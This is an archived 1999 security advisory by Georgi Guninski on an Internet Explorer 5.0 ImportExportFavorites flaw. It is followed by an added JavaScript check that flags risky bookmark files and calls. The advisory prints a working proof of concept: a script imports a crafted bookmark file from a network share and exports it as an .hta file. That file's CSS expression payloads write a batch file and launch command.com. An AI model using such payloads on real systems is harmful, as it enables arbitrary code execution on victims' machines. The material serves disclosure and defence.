
ie5_vulnerabilities.txt

19 Sep 1999 | Reported by Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

IE 5.0 vulnerabilities allow file manipulation via ImportExportFavorites, risking DoS and execution.

Code
`Subject: IE 5.0 security vulnerabilities - ImportExportFavorites - at  
least creating and overwriting files, probably executing programs  
To: [email protected]   
  
  
Disclaimer:  
The opinions expressed in this advisory and program are my own and not  
of any company.  
The usual standard disclaimer applies, especially the fact that Georgi  
Guninski  
is not liable for any damages caused by direct or indirect use of the  
information or functionality provided by this program.  
Georgi Guninski, bears NO responsibility for content or misuse of this  
program or any derivatives thereof.  
  
  
Description:  
  
  
Internet Explorer 5.0 under Windows 95/NT 4.0 (I suppose Win98 is  
vulnerable too)  
allows creating and overwriting local files, and in SOME cases putting  
content in them, using the window.external.ImportExportFavorites()  
method.  
Where content can be put in the file, arbitrary programs may be  
executed.  
  
  
Details:  
  
  
The problem is the window.external.ImportExportFavorites() method, which  
is used to  
import and export bookmarks from and to Netscape Communicator.  
The bigger problem is it allows creating and overwriting files, which  
obviously leads to a dangerous DoS attack.  
One may overwrite critical files which may lead to reinstalling Windows.  
Example of this is:  
<SCRIPT>  
window.external.ImportExportFavorites(0,"c:\\fav.hta");  
</SCRIPT>  
which will create a file c:\fav.hta, containing IE's favorites, without  
asking the user, just notifying him that the operation was successful.  
  
  
In SOME cases, HTML code may be injected in the exported file by  
importing a specially  
designed HTML file. The file to be imported may reside on a samba or  
Windows file server and may be accessed by Microsoft Networking.  
The difficult part is this must be exported by using only the <A> tag,  
but HTML Applications help again.  
  
  
I have verified importing on a Windows NT 4.0 box directly connected to  
the Internet and it worked fine.  
But I could not reproduce importing favorites with Windows 95 connected  
to the Internet via dial-up; I do not have enough network resources to  
investigate further.  
  
  
I SHALL MUCH APPRECIATE IT IF SOME NETWORK GURU EXPLAINS TO ME WHY  
IMPORTING USING MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES  
AND CONFIRMS OR DENIES THE POSSIBILITY OF IMPORTING FAVORITES FROM A  
NETWORK FILE SERVER.  
  
  
It is possible to import the file using the "http" protocol, but then  
the user must click the default button YES;  
Microsoft does not warn about any security problems in this case.  
  
  
  
So the code looks like this:  
  
  
In an HTML file:  
------------------------------------------------------------------  
<SCRIPT>  
// you must change the IP or make the file local !!!!!!!!!!  
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");  
// Sure, the StartUp folder is better  
window.external.ImportExportFavorites(0,"c:\\fav.hta");  
</SCRIPT>  
------------------------------------------------------------------  
In the imported file (fav.imp), residing on a samba or Windows server  
without authentication:  
-------------------------------------------------------------------  
<!DOCTYPE NETSCAPE-Bookmark-file-1>  
<DL>  
<DT><A HREF="#" STYLE="left:expression(eval('f= new  
ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo  
Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT  
created\');window.close();'));" ADD_DATE="923225094"  
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>  
<DT><A HREF="#" STYLE="left:expression(eval('a=new  
ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program  
started\');window.close()'));" ADD_DATE="923225094"  
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>  
</DL>  
-------------------------------------------------------------------  
To see the effect start c:\fav.hta (it may be placed in the StartUp  
folder and executed automatically)  
  
  
This vulnerability can be exploited via email or Usenet message using  
window.open().  
  
  
The user must have file sharing installed in order for remote importing  
to work.  
  
  
Workaround:  
Disable Active Scripting  
  
  
Demonstration is available at http://www.nat.bg/~joro/imp.html  
  
  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
`
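
A defensive check for the two artifacts the advisory describes, as an added example that is not part of the original advisory: it audits a Netscape bookmark file for `<A>` attributes that have no place there (such as `STYLE` with `expression()`), and lists `ImportExportFavorites()` calls in page source with their direction and path. The function names, the attribute allowlist, the extension list, the host `fileserver.example` and both sample inputs are assumptions constructed for illustration.

```javascript
// Added example: static checks for the bookmark file and the page script described above.
const ALLOWED_ATTRS = new Set(["href", "add_date", "last_visit", "last_modified"]); // assumed allowlist
const RISKY_EXT = /\.(hta|bat|cmd|com|exe|vbs|js|lnk)$/i; // assumed list of directly runnable types

// Flag <A> attributes in a Netscape bookmark file that should never be there.
function auditBookmarkFile(text) {
  const findings = [];
  // Quoted values may contain '>', so step over them when locating the end of the tag.
  const tagRe = /<a\b((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
  for (const tag of text.matchAll(tagRe)) {
    const attrRe = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
    for (const a of tag[1].matchAll(attrRe)) {
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (name === "style" && /expression\s*\(/i.test(value)) {
        findings.push("style:css-expression");
      } else if (name === "href" && /^\s*(javascript|vbscript):/i.test(value)) {
        findings.push("href:script-scheme");
      } else if (!ALLOWED_ATTRS.has(name)) {
        findings.push(name + ":unexpected-attribute");
      }
    }
  }
  return findings;
}

// List ImportExportFavorites() calls with a literal path (1 = import, 0 = export, as in the advisory).
function findImportExportCalls(html) {
  const callRe = /ImportExportFavorites\s*\(\s*([^,()]+?)\s*,\s*(["'])(.*?)\2\s*\)/g;
  return [...html.matchAll(callRe)].map((m) => {
    const path = m[3].replace(/\\\\/g, "\\"); // undo JavaScript string escaping
    return {
      direction: m[1] === "1" ? "import" : m[1] === "0" ? "export" : "unknown",
      path,
      remoteSource: path.startsWith("\\\\") || /^https?:/i.test(path),
      riskyTarget: RISKY_EXT.test(path),
    };
  });
}

// Constructed samples (not taken from the advisory).
const SAMPLE_BOOKMARKS = `<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DT><A HREF="http://example.com/" ADD_DATE="923225094">ok</A>
<DT><A HREF="#" STYLE="left:expression(1)" ONCLICK="x()">bad</A>`;
const SAMPLE_PAGE = String.raw`<SCRIPT>window.external.ImportExportFavorites(1,"\\\\fileserver.example\\share\\fav.imp");
window.external.ImportExportFavorites(0,"c:\\fav.hta");</SCRIPT>`;
console.log(auditBookmarkFile(SAMPLE_BOOKMARKS), findImportExportCalls(SAMPLE_PAGE));
```

An import from a remote source followed by an export to a directly runnable file type is the pairing to alert on; either call alone is weaker evidence.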
